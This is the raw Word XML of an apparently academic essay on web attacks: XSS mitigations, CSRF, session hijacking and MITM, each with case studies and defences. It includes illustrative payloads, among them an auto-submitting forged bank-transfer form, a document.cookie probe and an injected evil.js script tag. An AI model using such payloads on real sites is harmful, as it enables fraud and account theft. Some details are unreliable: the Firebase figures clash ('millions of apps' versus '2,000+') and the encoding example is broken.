        <w:t xml:space="preserve"> (2018) estimated direct losses at £17 million, compounded by a £183 million GDPR fine for lax security. “Third-party scripts are a hidden danger,” warned </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RiskIQ’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yonathan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Klijnsma</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, highlighting the 500+ lines of injected code that evaded detection. The breach exposed the perils of unvetted dependencies, forcing British Airways to overhaul its security protocols and audit its supply chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E5D839" w14:textId="77777777" w:rsidR="00075C06" w:rsidRPr="00967003"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3.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Mitigation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A4FABE"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Sanitizing inputs with libraries like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DOMPurify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> removes malicious tags (e.g., converting &lt;script&gt; to plain text). Output encoding—transforming &lt; to &lt;—prevents execution across HTML, CSS, or JavaScript contexts. A Content Security Policy (CSP) header, such as Content-Security-Policy: script-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'self' 'cdn.trusted.com'; object-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'none</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>';,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> restricts script and object sources, though misconfiguration risks false positives. Cookies with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> flags block script access, ineffective against DOM-based XSS. Regular dependency audits, sandboxing third-party scripts with &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sandbox&gt;, and leveraging browser features like Chrome’s Trusted Types or legacy XSS Auditor </w:t>
      </w:r>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>enhance defenses. Developers must test rigorously, as attackers continually devise new evasion tactics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F342469"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4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00117950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E65C4BC"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4.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00117950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Definition and Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71392C0C"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CSRF exploits authenticated sessions to execute unauthorized actions. Attackers trick users into triggering requests—via links, images, or forms—that the server processes as legitimate. For example, a bank transfer endpoint (POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>transfer?amount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=1000&amp;to=account) could be forged with &lt;form action="http://bank.com/transfer" method="post"&gt;&lt;input type="hidden" name="amount" value="1000"&gt;&lt;input type="hidden" name="to" value="attacker"&gt;&lt;/form&gt;, auto-submitted via &lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>document.forms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>].submit()&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/script&gt;. If the user’s session cookie is active, the bank authenticates it unknowingly. CSRF relies on predictable endpoints and inadequate request validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395BBAB3"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4.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00117950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Case Study</w:t>
      </w:r>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00117950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Twitter CSRF Vulnerability (2010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648A8FE7" w14:textId="4F54ADED"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In September 2010, a CSRF flaw on Twitter enabled attackers to force users to follow accounts or post tweets. Malicious links, often embedded in trending topics or phishing emails, triggered actions when clicked. TechCrunch (2010) reported thousands of compromised accounts within hours, with tweets like “Follow @hacker” spreading virally across the platform. “It exploited trust in Twitter’s ecosystem,” said analyst Graham Cluley, emphasizing its simplicity and rapid escalation. Twitter patched it within a day, but the incident highlighted CSRF’s potential for social engineering, reputational damage, and user manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BF84AF"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4.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00117950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Mitigation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7851F966"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lastRenderedPageBreak/>
        <w:t>Anti-CSRF tokens—random, session-specific values (e.g., &lt;input type="hidden" name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>csrf_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">" value="xyz789"&gt;)—are validated server-side, blocking forged requests. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookie attribute (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=Strict or Lax) limits cross-site cookie sending, though support varies across older browsers like IE11. Re-authentication for sensitive actions (e.g., password prompts for transfers) deters attacks, despite potential UX friction. Restricting endpoints to POST requests reduces exposure, as GET requests are simpler to forge via &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt; or &lt;a&gt; tags. Rate limiting, CAPTCHA challenges for repetitive actions, and monitoring unusual activity (e.g., sudden account changes) provide additional layers of security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD9B75C"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5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00117950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5C479E"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5.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00117950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Definition and Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71347AB2"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Session Hijacking steals or predicts a user’s session ID to impersonate them. Attackers might sniff cookies over unsecured Wi-Fi, guess weak IDs (e.g., session=12345), or use XSS to extract them (alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)). A stolen PHPSESSID cookie could grant full account access—viewing emails, making purchases, or changing settings—until the session expires or is regenerated. This threat exploits poor session management (e.g., no regeneration), unencrypted traffic (HTTP), or predictable ID generation (e.g., timestamp-based or sequential).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0553FA00" w14:textId="77777777" w:rsidR="00075C06" w:rsidRPr="00117950" w:rsidRDefault="00075C06" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00117950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Case Study</w:t>
      </w:r>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00117950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Firebase Misconfiguration (2018)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AA84E1"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In 2018, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Appthority</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> uncovered millions of mobile apps using Google’s Firebase with exposed databases and weak session security. Attackers hijacked sessions via predictable tokens, accessing PII like medical records, banking details, and location data across 2,000+ apps. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Appthority</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2018) estimated 100 million records at risk, spanning healthcare, finance, and gaming sectors. “Developers ignored basic security principles,” the report noted, citing misconfigured APIs, </w:t>
      </w:r>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>insufficient entropy in token generation, and lack of encryption. The findings prompted Firebase to bolster default settings and issue developer guidelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B86C08"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5.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00117950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Mitigation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F151C8B"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Secure cookies with Secure and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> flags prevent interception and script access. Regenerating session IDs after login or privilege changes (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>session_regenerate_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(true) in PHP) thwarts reuse. HTTPS encrypts traffic end-to-end, though compromised endpoints or misconfigured certificates remain risks. Short session timeouts (e.g., 15-30 minutes) force re-authentication, balancing security with usability—too short, and users complain; too long, and risks increase. Strong, random session IDs (128+ bits, cryptographically secure via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>random_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)) resist prediction. Logging session activity (e.g., IP, timestamp) and flagging anomalies (e.g., location jumps) enable swift detection and response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F4BC5B"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6. </w:t>
      </w:r>
      <w:r w:rsidRPr="00117950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Man-in-the-Middle (MITM) Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EABEAC"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6.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00117950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Definition and Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A192EB"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MITM Attacks intercept communication between a client and server, allowing attackers to eavesdrop or manipulate data. Techniques include ARP spoofing (rerouting LAN traffic), DNS spoofing (redirecting to fake domains), or exploiting unsecured Wi-Fi. For instance, an attacker on public Wi-Fi might intercept an HTTP login, capturing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>username:password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in plaintext, or forge an HTTPS certificate to decrypt traffic (e.g., via tools like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sslstrip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). MITM can also inject malicious code (e.g., &lt;script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>="evil.js"&gt;) or alter responses (e.g., changing bank balances), exploiting trust in network infrastructure and weak encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8E1152" w14:textId="77777777" w:rsidR="00075C06" w:rsidRPr="00117950" w:rsidRDefault="00075C06" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00117950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Case Study</w:t>
      </w:r>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
